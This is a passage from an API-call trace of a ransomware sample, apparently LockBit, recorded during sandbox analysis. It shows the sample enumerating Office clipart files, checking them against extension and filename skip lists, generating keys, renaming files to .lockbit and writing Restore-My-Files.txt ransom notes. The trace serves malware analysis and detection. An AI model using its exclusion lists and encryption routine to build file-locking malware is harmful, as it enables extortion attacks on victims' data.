param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.062] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.062] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02356_.WMF", cAlternateFileName="")) returned 1 [0164.062] lstrcmpiW (lpString1=".", lpString2="NA02356_.WMF") returned -1 [0164.062] lstrcmpiW (lpString1="..", lpString2="NA02356_.WMF") returned -1 [0164.062] PathFindExtensionW (pszPath="NA02356_.WMF") returned=".WMF" [0164.062] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.062] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.063] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.063] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02356_.WMF") returned 1 [0164.064] lstrcmpiW (lpString1="ntldr", lpString2="NA02356_.WMF") returned 1 [0164.064] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02356_.WMF") returned 1 [0164.064] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02356_.WMF") returned -1 [0164.064] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02356_.WMF") returned -1 [0164.064] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02356_.WMF") returned 1 [0164.064] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02356_.WMF") returned -1 [0164.064] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.064] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02356_.WMF") returned=".WMF" [0164.064] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.064] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.064] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.065] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.065] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02356_.WMF.lockbit") returned 72 [0164.065] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02356_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02356_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0164.066] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.066] malloc (_Size=0x40068) returned 0x1ff1e60 [0164.066] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3604) returned 1 [0164.066] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.067] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0164.067] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0164.068] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.092] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02356_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02356_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.092] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.092] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.095] free (_Block=0x1fa2ed8) [0164.095] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02356_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.095] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.095] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.095] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x17c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02361_.WMF", cAlternateFileName="")) returned 1 [0164.096] lstrcmpiW (lpString1=".", lpString2="NA02361_.WMF") returned -1 [0164.096] lstrcmpiW (lpString1="..", lpString2="NA02361_.WMF") returned -1 [0164.096] PathFindExtensionW (pszPath="NA02361_.WMF") returned=".WMF" [0164.096] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.096] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.097] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.097] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02361_.WMF") returned 1 [0164.098] lstrcmpiW (lpString1="ntldr", lpString2="NA02361_.WMF") returned 1 [0164.098] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02361_.WMF") returned 1 [0164.098] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02361_.WMF") returned -1 [0164.098] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02361_.WMF") returned -1 [0164.098] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02361_.WMF") returned 1 [0164.098] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02361_.WMF") returned -1 [0164.098] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.098] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02361_.WMF") returned=".WMF" [0164.098] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.098] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.098] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.099] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.099] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02361_.WMF.lockbit") returned 72 [0164.099] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02361_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0164.100] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.100] malloc (_Size=0x40068) returned 0x3df0008 [0164.100] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6084) returned 1 [0164.100] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0164.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.101] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0164.101] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0164.110] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02361_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02361_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.110] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.110] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.112] free (_Block=0x1fa2ed8) [0164.112] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02361_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.112] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.112] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.112] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd28, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02368_.WMF", cAlternateFileName="")) returned 1 [0164.112] lstrcmpiW (lpString1=".", lpString2="NA02368_.WMF") returned -1 [0164.112] lstrcmpiW (lpString1="..", lpString2="NA02368_.WMF") returned -1 [0164.112] PathFindExtensionW (pszPath="NA02368_.WMF") returned=".WMF" [0164.112] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.112] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.112] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.112] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.112] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.112] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.112] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.112] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.112] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.112] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.112] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.113] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.113] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02368_.WMF") returned 1 [0164.114] lstrcmpiW (lpString1="ntldr", lpString2="NA02368_.WMF") returned 1 [0164.114] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02368_.WMF") returned 1 [0164.114] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02368_.WMF") returned -1 [0164.114] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02368_.WMF") returned -1 [0164.114] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02368_.WMF") returned 1 [0164.114] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02368_.WMF") returned -1 [0164.114] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.114] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02368_.WMF") returned=".WMF" [0164.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.114] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.114] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.115] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 